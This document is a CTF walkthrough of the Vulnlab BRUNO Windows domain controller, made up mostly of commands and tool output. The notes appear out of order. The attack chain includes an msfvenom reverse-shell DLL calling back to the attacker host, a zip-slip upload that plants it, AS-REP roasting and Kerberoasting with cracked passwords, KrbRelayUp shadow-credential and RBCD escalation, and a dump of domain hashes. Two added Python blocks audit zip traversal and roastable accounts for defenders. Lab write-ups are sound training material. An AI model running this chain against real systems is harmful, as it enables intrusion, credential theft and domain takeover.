Here are my notes on the BRUNO box from Vulnlab.
BRUNO: 10.10.87.117
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-29-22 04:55PM <DIR> app
| 06-29-22 04:33PM <DIR> benign
ftp> cd benign
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||62894|)
125 Data connection already open; Transfer starting.
06-29-22 04:32PM 4 test.exe
226 Transfer complete.
ftp> cd ..
250 CWD command successful.
ftp> cd app
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||62901|)
150 Opening ASCII mode data connection.
06-29-22 05:42PM 165 changelog
06-28-22 07:15PM 431 SampleScanner.deps.json
06-29-22 03:58PM 7168 SampleScanner.dll
06-29-22 03:58PM 174592 SampleScanner.exe
06-28-22 07:15PM 170 SampleScanner.runtimeconfig.dev.json
06-28-22 07:15PM 154 SampleScanner.runtimeconfig.json
226 Transfer complete.
#Access-Denied.
SampleScanner DLL Hijacking:
https://medium.com/@arz101/vulnlab-bruno-f0129f60ac40
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.0.71 LPORT=2222 -f dll > Microsoft.DiaSymReader.Native.amd64.dll
┌──(root㉿kali)-[/home/…/COMP/BRUNO/10.10.87.117/evilarc]
└─# python2 evilarc.py Microsoft.DiaSymReader.Native.amd64.dll -p app -d 1
Creating evil.zip containing ..\app\Microsoft.DiaSymReader.Native.amd64.dll
#Then upload evil.zip to the queue share over SMB; the scanner extracts it and loads the planted DLL, giving us a shell.
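The upload works because the scanner unpacks archive members without checking where their names point (the `..\app\...` entry evilarc creates lands next to SampleScanner.exe). As an added example, not code from the box or from evilarc, here is the check an extractor should apply before writing any member, run against a constructed archive with one traversal entry:

```python
import io
import os
import posixpath
import tempfile
import zipfile

# Constructed test archive (not the one from the box): one benign entry plus one
# entry whose name climbs out of the extraction root, like evilarc's "..\app\..." member.
def build_test_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.txt", "harmless sample\n")
        zf.writestr(r"..\app\Microsoft.DiaSymReader.Native.amd64.dll", b"MZ placeholder")
    return buf.getvalue()

def is_safe_member(name: str) -> bool:
    """True only if the member stays inside the extraction root: no absolute
    path, no drive letter, no '..' component after normalising separators."""
    norm = name.replace("\\", "/")
    if norm.startswith("/") or (len(norm) > 1 and norm[1] == ":"):
        return False
    parts = posixpath.normpath(norm).split("/")
    return ".." not in parts

def audit_zip(data: bytes) -> dict:
    """Classify every member name as 'ok' or 'traversal' without extracting."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {i.filename: "ok" if is_safe_member(i.filename) else "traversal"
                for i in zf.infolist()}

def safe_extract(data: bytes, dest: str) -> list:
    """Extract only members that pass the check; return the rejected names."""
    rejected = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if is_safe_member(info.filename):
                zf.extract(info, dest)
            else:
                rejected.append(info.filename)
    return rejected

def run_demo() -> tuple:
    """Extract the test archive into a scratch directory; return (extracted, rejected)."""
    dest = tempfile.mkdtemp(prefix="queue_")
    rejected = safe_extract(build_test_zip(), dest)
    extracted = sorted(os.listdir(dest))
    return extracted, rejected

if __name__ == "__main__":
    print(audit_zip(build_test_zip()))
    print(run_demo())
```

Python's own `ZipFile.extract` already strips traversal components, so `audit_zip` is the part worth reusing: it lets a scanner or a share monitor flag an archive like evil.zip on arrival instead of discovering it after the DLL has been loaded.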
┌──(root㉿kali)-[/home/…/COMP/BRUNO/10.10.87.117/evilarc]
└─# smbclient \\\\10.10.87.117\\queue -U "svc_net"
Password for [WORKGROUP\svc_net]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jan 27 11:58:28 2024
.. D 0 Wed Jun 29 09:41:03 2022
7863807 blocks of size 4096. 3737830 blocks available
smb: \> put evil.zip
putting file evil.zip as \evil.zip (15.0 kb/s) (average 15.0 kb/s)
smb: \> ls
. D 0 Sat Jan 27 12:47:13 2024
.. D 0 Wed Jun 29 09:41:03 2022
evil.zip A 9406 Sat Jan 27 12:47:13 2024
7863807 blocks of size 4096. 3737827 blocks available
smb: \>
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.8.0.71:2222
[*] Command shell session 1 opened (10.8.0.71:2222 -> 10.10.87.117:62242) at 2024-01-27 12:47:33 -0500
Shell Banner:
Microsoft Windows [Version 10.0.20348.768]
-----
C:\Windows\system32>whoami
whoami
bruno\svc_scan
C:\Windows\system32>
USER SHELL !
PRIV ESC:
KrbRelay and RBCD Privilege Escalation NOTES:
Prerequisites:
* LDAP signing not required on Domain Controller (default!)
* Ability for the current domain user to add computers to the domain (ms-DS-MachineAccountQuota = 10 by default!) or an owned computer account
┌──(root㉿kali)-[/home/…/COMP/BRUNO/10.10.87.117/evilarc]
└─# crackmapexec ldap 10.10.87.117 -u svc_scan -p 'Sunshine1' -M maq
SMB 10.10.87.117 445 BRUNODC [*] Windows 10.0 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.87.117 389 BRUNODC [+] bruno.vl\svc_scan:Sunshine1
MAQ 10.10.87.117 389 BRUNODC [*] Getting the MachineAccountQuota
MAQ 10.10.87.117 389 BRUNODC MachineAccountQuota: 10
┌──(root㉿kali)-[/home/…/COMP/BRUNO/10.10.87.117/evilarc]
└─# crackmapexec ldap 10.10.87.117 -u svc_scan -p 'Sunshine1' -M ldap-checker
SMB 10.10.87.117 445 BRUNODC [*] Windows 10.0 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.87.117 389 BRUNODC [+] bruno.vl\svc_scan:Sunshine1
LDAP-CHE... 10.10.87.117 389 BRUNODC LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.87.117 389 BRUNODC Channel Binding is set to "NEVER" - Time to PWN!
.\KrbRelayUp.exe full -m shadowcred -cls {d99e6e73-fc88-11d0-b498-00a0c90312f3} -p 10246
#Using Rubeus to request a TGT for brunodc$ through PKINIT authentication with the shadow credential:
Rubeus.exe asktgt /user:brunodc$ /certificate:MIIKSAIBAzCCCgQGC...snip.... /password:tV0-oN8$aB7- /enctype:AES256 /nowrap
#Converting the kirbi format to ccache so we can use it with secretsdump.py:
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# cat bruno_ticket | base64 -d > bruno_ticket.kirbi
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# impacket-ticketConverter bruno_ticket.kirbi bruno_ticket.ccache
Impacket v0.11.0 - Copyright 2023 Fortra
[*] converting kirbi to ccache...
[+] done
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# export KRB5CCNAME=./bruno_ticket.ccache
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# secretsdump.py 'brunodc$'@brunodc.bruno.vl -k -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13735c7d[REDIRECTED]
Privilege Escalation through Resource Based Constrained Delegation (RBCD):
.\KrbRelayUp.exe full -m rbcd -c -cls {d99e6e73-fc88-11d0-b498-00a0c90312f3} -p 10246
getST.py -impersonate 'Administrator' bruno.vl/'KRBRELAYUP$':'hV1/xN0#aF8=yW1$' -spn HOST/BRUNODC
smbexec.py administrator@brunodc -k -no-pass
https://medium.com/@arz101/vulnlab-bruno-f0129f60ac40
https://vulndev.io/cheats-windows/
https://mayfly277.github.io/posts/GOADv2-pwning-part8/#krbrelay-up
https://github.com/Dec0ne/KrbRelayUp
https://github.com/gist/tothi/bf6c59d6de5d0c9710f23dae5750c4b9
ADMIN SHELL !
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/29/2022 3:00 PM 37 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
VL{REDIRECTED}
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
FLAG.TXT: VL{REDIRECTED}
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/19/2021 6:24 AM EFI
d----- 6/29/2022 2:43 PM inetpub
d----- 5/8/2021 8:20 AM PerfLogs
d-r--- 6/29/2022 4:15 PM Program Files
d----- 6/29/2022 1:28 PM Program Files (x86)
d----- 6/29/2022 1:41 PM samples
d-r--- 6/29/2022 4:09 PM Users
d----- 6/29/2022 1:32 PM Windows
-a---- 6/29/2022 3:00 PM 37 user.txt
*Evil-WinRM* PS C:\> type user.txt
VL{REDIRECTED}
*Evil-WinRM* PS C:\>
FLAG.TXT: VL{REDIRECTED}
#No File Upload.
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# cat changelog
Version 0.3
- integrated with dev site
- automation using svc_scan
Version 0.2
- additional functionality
Version 0.1
- initial support for EICAR string
#svc_scan user found in the changelog; we are going to AS-REP roast it.
| 06-29-22 01:41PM <DIR> malicious - EMPTY
|_06-29-22 04:33PM <DIR> queue - EMPTY
53/tcp open domain Simple DNS Plus
bloodhound-python -c all -u svc_net -p 'Sunshine1' -d bruno.vl -ns 10.10.87.117
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-27 16:17:38Z)
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# impacket-GetNPUsers -dc-ip 10.10.87.117 -request -outputfile hashes.asreproast bruno.vl/svc_scan
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate svc_scan, getting its TGT
$krb5asrep$23$svc_scan@BRUNO.VL:afe3beb60f73fa5f74c57c776e3a6756$90017b9267c63b96f010fa2f2aff301fc2e2ac5cf494554deef19713e6fad06e355e272970c5aadf89f6af8b3527c4208ce9736f8c051c87d2895ce11d099d8c6152d3d74adfe5a257931485245cbfdd89f29d0b4b5c2245ac1cea32d485a5dd0d4ba14605e92e10622266af86ea6e7dddc58bb7285f5bb2f4c80b0b6b57805591e6464875b69ea4ec3704d79d6cc33961ca9d79d1b3e2d5062e82e020c2c814972c4dfd383422ebe1ac8062ff756c0a1a47cc9763798d241f58f800bf3a67e5dd8052a5fc718a24488aaae5d76e24f6b152f3475c019b54d533af276b56bae82aba909b
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# sudo leafpad hash.txt
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sunshine1 ($krb5asrep$23$svc_scan@BRUNO.VL)
1g 0:00:00:00 DONE (2024-01-27 11:33) 8.333g/s 251733p/s 251733c/s 251733C/s sammy10..starrs
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
svc_scan:Sunshine1
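svc_scan could be roasted because pre-authentication is not required on the account, and the `$krb5asrep$23$` prefix shows the AS-REP came back RC4-encrypted, which is what makes the rockyou run above finish in under a second. As an added example, not part of the original notes, here is an audit that flags the two conditions over constructed LDAP-style records (the userAccountControl values and SPNs are made up to mirror the box, not exported from it) and parses the hash line format GetNPUsers writes:

```python
import re

# userAccountControl bits (documented Microsoft values)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed records in the shape of an LDAP export; not real data from the box.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc_scan", "userAccountControl": 0x410200,
     "servicePrincipalName": ["SCAN/brunodc.bruno.vl"]},
    {"sAMAccountName": "svc_net", "userAccountControl": 0x10200,
     "servicePrincipalName": ["NET/brunodc.bruno.vl"]},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x10200,
     "servicePrincipalName": []},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x400202,   # disabled
     "servicePrincipalName": ["HTTP/old.bruno.vl"]},
]

def audit_accounts(records):
    """Return {sAMAccountName: [issue, ...]} for enabled accounts that are
    AS-REP roastable (pre-auth not required) or Kerberoastable (SPN set)."""
    findings = {}
    for r in records:
        uac = r["userAccountControl"]
        if uac & UF_ACCOUNTDISABLE:
            continue  # a disabled account gets no tickets, so nothing to roast
        issues = []
        if uac & UF_DONT_REQUIRE_PREAUTH:
            issues.append("asrep-roastable")
        if r.get("servicePrincipalName"):
            issues.append("kerberoastable")
        if issues:
            findings[r["sAMAccountName"]] = issues
    return findings

HASH_RE = re.compile(r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):")

def parse_asrep_hash(line):
    """Pull etype, user and realm out of a $krb5asrep$ line as written by GetNPUsers;
    etype 23 means RC4, the cheapest variant to crack offline."""
    m = HASH_RE.match(line)
    if not m:
        return None
    etype = int(m["etype"])
    return {"etype": etype, "user": m["user"], "realm": m["realm"], "rc4": etype == 23}

if __name__ == "__main__":
    print(audit_accounts(SAMPLE_ACCOUNTS))
    print(parse_asrep_hash("$krb5asrep$23$svc_scan@BRUNO.VL:0000$0000"))
```

The fix on the defender side is clearing the "Do not require Kerberos preauthentication" flag on any account the audit reports and giving service accounts long random passwords (or gMSA) so a captured ticket cannot be cracked.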
└─# sudo impacket-GetUserSPNs -request -dc-ip 10.10.87.117 bruno.vl/svc_scan
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------- -------- -------- -------------------------- -------------------------- ----------
NET/brunodc.bruno.vl svc_net 2022-06-29 09:35:45.023707 2022-06-29 12:29:25.394301
SCAN/brunodc.bruno.vl svc_scan 2022-06-29 09:36:15.210348 2024-01-27 11:34:28.017766
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash2.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sunshine1 (?)
Sunshine1 (?)
2g 0:00:00:00 DONE (2024-01-27 11:36) 6.060g/s 93090p/s 186181c/s 186181C/s sammy10..*star*
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
svc_net:Sunshine1
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# sudo impacket-rpcdump @10.10.87.117 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# rpcclient --user="" -N 10.10.87.117
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> getdompwinfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# crackmapexec smb 10.10.87.117 -u guest -p '' --shares
SMB 10.10.87.117 445 BRUNODC [*] Windows 10.0 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB 10.10.87.117 445 BRUNODC [-] bruno.vl\guest: STATUS_ACCOUNT_DISABLED
-NOPE
-NO ANON CREDS.
-NO GUEST CREDS.
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# crackmapexec smb 10.10.87.117 -u users.txt -p 'Sunshine1' --shares
SMB 10.10.87.117 445 BRUNODC [*] Windows 10.0 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB 10.10.87.117 445 BRUNODC [+] bruno.vl\svc_net:Sunshine1
SMB 10.10.87.117 445 BRUNODC [+] Enumerated shares
SMB 10.10.87.117 445 BRUNODC Share Permissions Remark
SMB 10.10.87.117 445 BRUNODC ----- ----------- ------
SMB 10.10.87.117 445 BRUNODC ADMIN$ Remote Admin
SMB 10.10.87.117 445 BRUNODC C$ Default share
SMB 10.10.87.117 445 BRUNODC CertEnroll READ Active Directory Certificate Services share
SMB 10.10.87.117 445 BRUNODC IPC$ READ Remote IPC
SMB 10.10.87.117 445 BRUNODC NETLOGON READ Logon server share #NOTHING
SMB 10.10.87.117 445 BRUNODC queue READ,WRITE #Antivirus Enabled so No SCF ATTACK or SHELL ATTACKS.
SMB 10.10.87.117 445 BRUNODC SYSVOL READ Logon server share
┌──(root㉿kali)-[/home/…/BOXES/COMP/BRUNO/10.10.87.117]
└─# crackmapexec smb 10.10.87.117 -u svc_scan -p 'Sunshine1' --shares
SMB 10.10.87.117 445 BRUNODC [*] Windows 10.0 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB 10.10.87.117 445 BRUNODC [+] bruno.vl\svc_scan:Sunshine1
SMB 10.10.87.117 445 BRUNODC [+] Enumerated shares
SMB 10.10.87.117 445 BRUNODC Share Permissions Remark
SMB 10.10.87.117 445 BRUNODC ----- ----------- ------
SMB 10.10.87.117 445 BRUNODC ADMIN$ Remote Admin
SMB 10.10.87.117 445 BRUNODC C$ Default share
SMB 10.10.87.117 445 BRUNODC CertEnroll READ Active Directory Certificate Services share
SMB 10.10.87.117 445 BRUNODC IPC$ READ Remote IPC
SMB 10.10.87.117 445 BRUNODC NETLOGON READ Logon server share #NOTHING
SMB 10.10.87.117 445 BRUNODC queue READ,WRITE #Antivirus Enabled so No SCF ATTACK or SHELL ATTACKS.
SMB 10.10.87.117 445 BRUNODC SYSVOL READ Logon server share
SYSVOL:
┌──(root㉿kali)-[/home/…/BRUNO/10.10.87.117/JUNK/bruno.vl]
└─# tree .
.
├── DfsrPrivate
├── Policies
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ └── Registry.pol
│ │ └── USER
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ ├── Applications
│ │ ├── comment.cmtx #Interesting ? - NOPE
│ │ ├── Microsoft
│ │ │ └── Windows NT
│ │ │ └── SecEdit
│ │ │ └── GptTmpl.inf
│ │ ├── Registry.pol
│ │ └── Scripts
│ │ ├── Shutdown
│ │ └── Startup
│ └── USER
└── scripts
CertEnroll:
#It means there is a certificate authority on this box, so we are going to use certipy.
certipy find -vulnerable -stdout -u svc_net -p Sunshine1 -dc-ip 10.10.87.117
[*] Enumeration output:
Certificate Authorities
0
CA Name : bruno-BRUNODC-CA
DNS Name : brunodc.bruno.vl
Certificate Subject : CN=bruno-BRUNODC-CA, DC=bruno, DC=vl
Certificate Serial Number : 52D11B2B5CC276A54DE5B77F5E125E8D
Certificate Validity Start : 2022-06-29 13:23:01+00:00
Certificate Validity End : 2121-06-29 13:33:00+00:00
Web Enrollment : Enabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : BRUNO.VL\Administrators
Access Rights
ManageCa : BRUNO.VL\Administrators
BRUNO.VL\Domain Admins
BRUNO.VL\Enterprise Admins
ManageCertificates : BRUNO.VL\Administrators
BRUNO.VL\Domain Admins
BRUNO.VL\Enterprise Admins
Enroll : BRUNO.VL\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates : [!] Could not find any certificate templates
-NOPE, a rabbit hole: ESC8 needs an NTLM relay target and no templates are enrollable here.
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Not valid before: 2023-08-22T06:05:15
|_Not valid after: 2024-08-21T06:05:15
|_ssl-date: 2024-01-27T16:19:03+00:00; -1s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=bruno-BRUNODC-CA
| Not valid before: 2022-06-29T13:23:01
|_Not valid after: 2121-06-29T13:33:00
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Not valid before: 2023-08-22T06:05:15
|_Not valid after: 2024-08-21T06:05:15
|_ssl-date: 2024-01-27T16:19:02+00:00; 0s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-27T16:19:02+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Not valid before: 2023-08-22T06:05:15
|_Not valid after: 2024-08-21T06:05:15
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Not valid before: 2023-08-22T06:05:15
|_Not valid after: 2024-08-21T06:05:15
|_ssl-date: 2024-01-27T16:19:02+00:00; 0s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Not valid before: 2024-01-26T16:16:27
|_Not valid after: 2024-07-27T16:16:27
|_ssl-date: 2024-01-27T16:19:02+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: BRUNO
| NetBIOS_Domain_Name: BRUNO
| NetBIOS_Computer_Name: BRUNODC
| DNS_Domain_Name: bruno.vl
| DNS_Computer_Name: brunodc.bruno.vl
| DNS_Tree_Name: bruno.vl
| Product_Version: 10.0.20348
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: BRUNODC; OS: Windows; CPE: cpe:/o:microsoft:windows